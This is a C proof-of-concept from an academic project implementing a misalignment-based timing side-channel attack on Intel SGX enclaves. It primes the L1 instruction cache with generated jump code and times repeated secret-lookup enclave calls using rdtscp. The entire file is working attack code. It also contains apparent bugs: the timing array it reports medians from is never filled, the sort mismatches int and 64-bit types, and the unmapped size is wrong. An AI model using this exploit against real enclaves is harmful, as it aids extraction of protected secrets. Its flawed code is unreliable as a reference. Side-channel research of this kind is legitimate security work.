/*
** SGX non multi-threading (non-MT) stealthy misalignment-based attack

** Usage: see README (step 5) in the top level 
** Authors: 
** Shuwen Deng (shuwen.deng@yale.edu)
** Bowen Huang (bowen.huang@yale.edu)
** Jakub Szefer (jakub.szefer@yale.edu)
*/
/* utility headers */
#include "debug.h"
#include "cacheutils.h"

/* SGX untrusted runtime */
#include <sgx_urts.h>
#include "Enclave/encl_u.h"

#define NUM_SAMPLES         254//1 //5
#define NUM_SLOTS           32 //10
#define SLOT_SIZE           0x1000
#define ARRAY_LEN           (NUM_SLOTS*SLOT_SIZE)
#define GET_SLOT(k)         (array[k*SLOT_SIZE])
char __attribute__((aligned(0x1000))) array[ARRAY_LEN];

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/mman.h>
#include <assert.h>
#include <strings.h>
#include <inttypes.h>
#include <x86intrin.h>

#define L1I_ASSOCIATIVITY 8
#define L1I_CACHELINE 32
#define L1I_SETS 32
#define PAGE_SIZE 4096

#define JMP_OFFSET ((L1I_CACHELINE) * (L1I_SETS) - 25) 
#define JMP_OPCODE 0xE9
#define RET_OPCODE 0xC3

#define SET(page, set) (((uint8_t *)l1i->memory) + L1I_CACHELINE * ((set) + (page) * (L1I_SETS))) 

typedef struct l1ipp *l1ipp_t;
l1ipp_t l1i_prepare();
void l1i_release(l1ipp_t l1i);

int l1i_monitor(l1ipp_t l1i, int line);
int l1i_unmonitor(l1ipp_t l1i, int line);
void l1i_monitorall(l1ipp_t l1i);
void l1i_unmonitorall(l1ipp_t l1i);
int l1i_getmonitoredset(l1ipp_t l1i, int *lines, int nlines);
void l1i_randomise(l1ipp_t l1);

void l1i_probe(l1ipp_t l1, uint16_t *results);
int l1i_repeatedprobe(l1ipp_t l1, int nrecords, uint64_t *results, int slot);

struct l1ipp{
  void *memory;
  uint8_t monitored[L1I_SETS];
  void *sets[L1I_SETS];
  int nsets;
};

static inline uint64_t rdtscp64() {
  uint32_t low, high;
  asm volatile ("rdtscp": "=a" (low), "=d" (high) :: "ecx");
  return (((uint64_t)high) << 32) | low;
}

l1ipp_t l1i_prepare(void) {
  static uint8_t jmp[] = { JMP_OPCODE, 
    				JMP_OFFSET & 0xff, 
				(JMP_OFFSET >>8) & 0xff, 
    				(JMP_OFFSET >> 16) & 0xff, 
				(JMP_OFFSET >> 24) & 0xff};
  

  l1ipp_t l1i = (l1ipp_t)malloc(sizeof(struct l1ipp));
  l1i->memory = mmap(0, PAGE_SIZE * L1I_ASSOCIATIVITY*2, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0);
  for (int i = 0; i < L1I_SETS; i++) {
    for (int j = 0; j < L1I_ASSOCIATIVITY - 1; j++) {
      uint8_t *p = SET(j, i);
      *p++ = 0xB8;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xB9;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBB;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBA;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = JMP_OPCODE;
      *p++ = JMP_OFFSET & 0xff;
      *p++ = (JMP_OFFSET >>8) & 0xff;
      *p++ = (JMP_OFFSET >> 16) & 0xff;
      *p++ = (JMP_OFFSET >> 24) & 0xff;
    }
    *SET(L1I_ASSOCIATIVITY - 1, i) = RET_OPCODE;
    for (int j = L1I_ASSOCIATIVITY; j < L1I_ASSOCIATIVITY+3 - 1; j++) {
      uint8_t *p = SET(j, i);
      *p++ = 0xB8;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xB9;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBB;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBA;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = JMP_OPCODE;
      *p++ = JMP_OFFSET & 0xff;
      *p++ = (JMP_OFFSET >>8) & 0xff;
      *p++ = (JMP_OFFSET >> 16) & 0xff;
      *p++ = (JMP_OFFSET >> 24) & 0xff;

    }
    *SET(L1I_ASSOCIATIVITY+3 - 1, i) = RET_OPCODE;
  }
  l1i_monitorall(l1i);
  return l1i;
}

void l1i_release(l1ipp_t l1i) {
  munmap(l1i->memory, PAGE_SIZE * L1I_ASSOCIATIVITY);
  bzero(l1i, sizeof(struct l1ipp));
  free(l1i);
}

int l1i_monitor(l1ipp_t l1i, int line) {
  for (int i = 0;  i < l1i->nsets; i++) 
    if (l1i->monitored[i] == line) 
      return 0;
  l1i->monitored[l1i->nsets++] = line;
  return 1;
}

int l1i_unmonitor(l1ipp_t l1i, int line) {
  for (int i = 0;  i < l1i->nsets; i++) 
    if (l1i->monitored[i] == line) {
      l1i->monitored[i] = l1i->monitored[l1i->nsets--];
      return 1;
    }
  return 0;
}

void l1i_monitorall(l1ipp_t l1i) {
  for (int i = 0; i < L1I_SETS; i++)
    l1i->monitored[i] = i;
  l1i->nsets = L1I_SETS;
  l1i_randomise(l1i);
}

void l1i_unmonitorall(l1ipp_t l1i) {
  l1i->nsets = 0;
}


int l1i_getmonitoredset(l1ipp_t l1i, int *lines, int nlines) {
  if (lines != NULL) {
    if (nlines > l1i->nsets)
      nlines = l1i->nsets;
    for (int i = 0; i < nlines; i++)
      lines[i] = l1i->monitored[i];
  }
  return l1i->nsets;
}


int l1i_nsets(l1ipp_t l1i) {
  return l1i->nsets;
}

void l1i_randomise(l1ipp_t l1i) {
  char *mem = (char *)l1i->memory;
  for (int i = 0; i < l1i->nsets; i++) {
  }
}
typedef void (*fptr)(void);

void dump_ecall_secret_lookup(sgx_enclave_id_t eid){
  printf("Creating dump...");
  SGX_ASSERT( ecall_secret_lookup(eid));
}
void dump_ecall_secret_lookup_notmap(sgx_enclave_id_t eid){
  printf("Creating dump unmap...");
  SGX_ASSERT( ecall_secret_lookup_notmap(eid));
}


sgx_enclave_id_t create_enclave(void)
{
    sgx_launch_token_t token = {0};
    int updated = 0;
    sgx_enclave_id_t eid = -1;

    info_event("Creating enclave...");
    SGX_ASSERT( sgx_create_enclave( "./Enclave/encl.so", /*debug=*/1,
                                    &token, &updated, &eid, NULL ) );

    return eid;
}

int compare(const void * a, const void * b) {
   return ( *(uint64_t*)a - *(uint64_t*)b );
}

#define samples 1 //20 
int tsc[samples][NUM_SLOTS][NUM_SAMPLES];

void usage(const char *prog) {
  fprintf(stderr, "Usage: %s <samples>\n", prog);
  exit(1);
}

int main( int argc, char **argv )
{
    sgx_enclave_id_t eid = create_enclave();
    int rv = 1, secret = 0;
    int i, j, med;
    int index=0;

    uint32_t res_low=0, res_high=0, res2_low=0, res2_high=0;
    
    /* Ensure array pages are mapped in */
    for (i=0; i < ARRAY_LEN; i++)
        array[i] = 0x00;

    for (index=0;index<samples;index++)
    for (j=0; j < NUM_SLOTS; j++)
        for (i=0; i < NUM_SAMPLES; i++)
            tsc[index][j][i] =0;
    

  l1ipp_t l1i = l1i_prepare();

  int nsets = l1i_getmonitoredset(l1i, NULL, 0);

  int *map = calloc(nsets, sizeof(int));
  l1i_getmonitoredset(l1i, map, nsets);

  int rmap[L1I_SETS];
  for (int i = 0; i < L1I_SETS; i++)
    rmap[i] = -1;
  for (int i = 0; i < nsets; i++)
    rmap[map[i]] = i;
  

  uint64_t *res = calloc(samples * nsets, sizeof(uint64_t));
  for (int i = 0; i < samples * nsets; i+= 4096/sizeof(uint64_t))
    res[i] = 0;
  int iiii;






    /* ---------------------------------------------------------------------- */
    info_event("calling enclave...");

    /* =========================== START SOLUTION =========================== */
    FILE * fp;
    fp = fopen ("run_temp.txt", "w");
    
    
    for (int index=0; index < samples; index++){
    for (i=0; i < NUM_SAMPLES; i++)
    {

        asm volatile (
            "mfence\n"
            "lfence\n");
        asm volatile ("rdtscp": "=a" (res_low), "=d" (res_high) :: "ecx");

		    SGX_ASSERT( ecall_secret_lookup(eid));
            asm volatile (
          	"mfence\n"
          	"lfence\n");
    	  asm volatile ("rdtscp": "=a" (res2_low), "=d" (res2_high) :: "ecx");
        
        uint64_t final=0,final2=0;
        final=(((uint64_t)res_high) << 32) | res_low;
        final2=(((uint64_t)res2_high) << 32) | res2_low;
        fprintf(fp, "%llu\n", final2-final);

        // insert nopX2

        asm volatile (
            "mfence\n"
            "lfence\n");
        asm volatile ("rdtscp": "=a" (res_low), "=d" (res_high) :: "ecx");

		    SGX_ASSERT( ecall_secret_lookup_notmap(eid));
            asm volatile (
          	"mfence\n"
          	"lfence\n");
    	  asm volatile ("rdtscp": "=a" (res2_low), "=d" (res2_high) :: "ecx");

        final=0,final2=0;
        final=(((uint64_t)res_high) << 32) | res_low;
        final2=(((uint64_t)res2_high) << 32) | res2_low;
        fprintf(fp, "%llu\n", final2-final);

    }           
    }fclose(fp); 
    /* =========================== END SOLUTION =========================== */
    for (index=0; index<samples; index++){
    for (j=0; j < NUM_SLOTS; j++)
    {
        /* compute median over all samples (avg may be affected by outliers) */
        qsort(tsc[index][j], NUM_SAMPLES, sizeof(int), compare);
        med = tsc[index][j][NUM_SAMPLES/2];
    	printf("%3d\t", med);
    }
    printf("\n");
    }

    /* ---------------------------------------------------------------------- */
    info_event("destroying SGX enclave");
    SGX_ASSERT( sgx_destroy_enclave( eid ) );

    info("all is well; exiting..");
	return 0;
}
















